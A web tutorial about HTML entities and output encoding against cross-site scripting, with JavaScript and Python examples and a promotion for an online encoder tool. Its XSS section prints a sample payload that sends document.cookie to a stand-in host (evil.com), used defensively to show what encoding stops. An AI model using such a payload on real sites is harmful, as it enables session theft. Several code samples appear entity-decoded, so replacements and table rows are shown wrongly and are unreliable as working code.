What Are HTML Entities?
HTML entities are special sequences of characters that represent symbols which cannot be typed directly into HTML markup or which have reserved meaning in the HTML specification. Every entity begins with an ampersand (&) and ends with a semicolon (;). Between these delimiters sits either a human-readable name or a numeric code that tells the browser which character to render.
For example, the less-than sign (<) is reserved in HTML because it opens an element tag. If you want to display a literal less-than sign on a page, you must write < instead. The browser reads that entity and renders the visual character without interpreting it as the start of a tag. Without this mechanism, it would be impossible to show code snippets, mathematical expressions, or any content containing reserved characters on a webpage.
HTML entities also solve a practical problem with character encodings. Before UTF-8 became the dominant encoding on the web, many servers and browsers used ASCII or Latin-1, which could not represent characters like the euro sign, em dash, or characters from non-Latin scripts. Entities provided a reliable, encoding-independent way to include these characters. Even today, entities remain a best practice for certain characters because they are unambiguous regardless of the document encoding.
Why HTML Entity Encoding Matters
Preventing Cross-Site Scripting (XSS)
Cross-site scripting is one of the most common web security vulnerabilities, consistently appearing in the OWASP Top 10. An XSS attack occurs when an attacker injects malicious JavaScript into a page that other users will view. The simplest example is a comment field that accepts user input and renders it directly into HTML without sanitization:
<!-- User submits this as a comment -->
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
<!-- Without encoding, the browser executes the script -->
<!-- With encoding, it becomes harmless visible text: -->
<script>document.location='https://evil.com/steal?c='+document.cookie</script>When user-supplied content is properly entity-encoded before being inserted into the page, the browser displays the angle brackets and quotes as literal text rather than interpreting them as HTML or JavaScript. This is the first and most important line of defense against XSS. Every server-side template engine and modern frontend framework encodes output by default for exactly this reason.
Displaying Reserved Characters
HTML reserves five characters for its own syntax: the less-than sign (<), greater-than sign (>), ampersand (&), double quote ("), and single quote / apostrophe ('). If you write these characters directly inside HTML content, the browser may misinterpret them. For instance, an ampersand followed by text and a semicolon could be mistaken for an entity reference, leading to garbled output.
Technical documentation, code tutorials, and math-heavy pages rely heavily on entity encoding. Imagine trying to explain an HTML tag in a blog post without encoding the angle brackets — the browser would try to render it as an actual element instead of displaying the code.
Ensuring Cross-Browser Consistency
While modern browsers handle UTF-8 well, there are edge cases where certain Unicode characters render differently across operating systems and browsers. Non-breaking spaces ( ), soft hyphens (­), and zero-width joiners can behave unexpectedly. Using named entities for these characters makes your intent explicit and ensures consistent rendering.
Named Entities vs. Numeric Entities
HTML supports two formats for entities: named and numeric. Named entities use a mnemonic label that is easy to remember, while numeric entities use the Unicode code point of the character. Here is a comparison of the most commonly used entities:
Character Named Entity Decimal Entity Hex Entity
───────── ──────────── ────────────── ──────────
& & & &
< < < <
> > > >
" " " "
' ' ' '
(space)    
© © © ©
€ € € €
— — — —
™ ™ ™ ™Named entities are more readable in source code, which makes them the preferred choice when one exists for the character you need. However, not every Unicode character has a named entity. In those cases you must use the numeric form. The decimal form uses &# followed by the decimal code point, and the hexadecimal form uses &#x followed by the hex value.
One important note: ' was not officially part of HTML 4 and may not work in older parsers. The numeric form ' is safer for maximum compatibility. In HTML5, ' is fully supported.
Encoding HTML Entities in JavaScript
JavaScript does not have a built-in function specifically for HTML entity encoding, but you can achieve it in several ways. The most common approach is a simple replacement function:
function encodeHtmlEntities(str) {
return str
.replace(/&/g, "&")
.replace(/</g, "<")
.replace(/>/g, ">")
.replace(/"/g, """)
.replace(/'/g, "'");
}
// Usage
const userInput = '<script>alert("xss")</script>';
const safe = encodeHtmlEntities(userInput);
console.log(safe);
// <script>alert("xss")</script>Notice that the ampersand replacement must come first. If you replace angle brackets before ampersands, the ampersand in < would itself be double-encoded to &lt;.
For decoding, you can leverage the browser DOM. Creating a temporary textarea element and setting its innerHTML will cause the browser to decode all entities:
function decodeHtmlEntities(str) {
const textarea = document.createElement("textarea");
textarea.innerHTML = str;
return textarea.value;
}
const decoded = decodeHtmlEntities("<div class="box">");
console.log(decoded);
// <div class="box">In Node.js, where there is no DOM, you would use a library like he (HTML entities) or entities:
import he from "he";
// Encoding
he.encode('<script>alert("xss")</script>');
// "<script>alert("xss")</script>"
// Decoding
he.decode("<p>Hello & welcome</p>");
// "<p>Hello & welcome</p>"Encoding HTML Entities in Python
Python's standard library includes the html module which provides straightforward encoding and decoding:
import html
# Encoding
encoded = html.escape('<script>alert("xss")</script>')
print(encoded)
# <script>alert("xss")</script>
# By default, html.escape() encodes <, >, &, and "
# To also encode single quotes:
encoded = html.escape("It's a <test>", quote=True)
print(encoded)
# It's a <test>
# Decoding
decoded = html.unescape("<div>Hello & welcome</div>")
print(decoded)
# <div>Hello & welcome</div>The html.escape() function handles the five critical characters by default. For more comprehensive encoding that converts all non-ASCII characters to numeric entities, you can use the encode method with the xmlcharrefreplace error handler:
text = "Price: €50 — 20% off™"
encoded = text.encode("ascii", "xmlcharrefreplace").decode("ascii")
print(encoded)
# Price: €50 — 20% off™How to Use the PulpMiner HTML Entity Tool
The HTML Entity Encoder/Decoder handles conversion instantly in your browser:
- Paste your text or encoded HTML into the input area. The tool accepts raw HTML, entity-encoded strings, or any mix of both.
- Choose Encode or Decode — encoding converts special characters to their entity equivalents, while decoding converts entities back to their original characters.
- Copy the result with a single click. The output preserves whitespace and formatting exactly as you need it.
The tool supports all named HTML entities defined in the HTML5 specification, as well as decimal and hexadecimal numeric entities. It runs entirely in your browser, so your data never leaves your machine.
Best Practices for HTML Entity Encoding
- Always encode user-generated content before rendering it in HTML. This is the single most effective defense against XSS.
- Encode on output, not on input. Store the original text in your database and encode it at the point where it is inserted into the page. This preserves the original data and allows you to encode differently depending on the context (HTML body, attribute, JavaScript string, URL).
- Use your framework's built-in encoding. React escapes JSX expressions by default. Django auto-escapes template variables. Rails uses
html_safejudiciously. Do not bypass these protections unless you have a very specific reason. - Encode for the correct context. HTML body encoding is different from attribute encoding, which is different from JavaScript string encoding. A character that is safe in an HTML body might be dangerous inside an
onclickattribute. - Use named entities for readability when available. Write
&instead of&in your templates. Your future self will thank you when reading the source. - Test with edge cases. Include strings with nested entities, mixed encodings, and Unicode characters in your test suite. Ensure double-encoding does not occur (for example,
&amp;).
HTML entity encoding is a fundamental web development skill that sits at the intersection of security, correctness, and accessibility. Whether you are building a blog, an API dashboard, or a content management system, understanding how entities work ensures your pages render correctly and your users stay safe.
Ready to encode or decode HTML entities? Try the HTML Entity Tool — free, instant, and completely client-side.
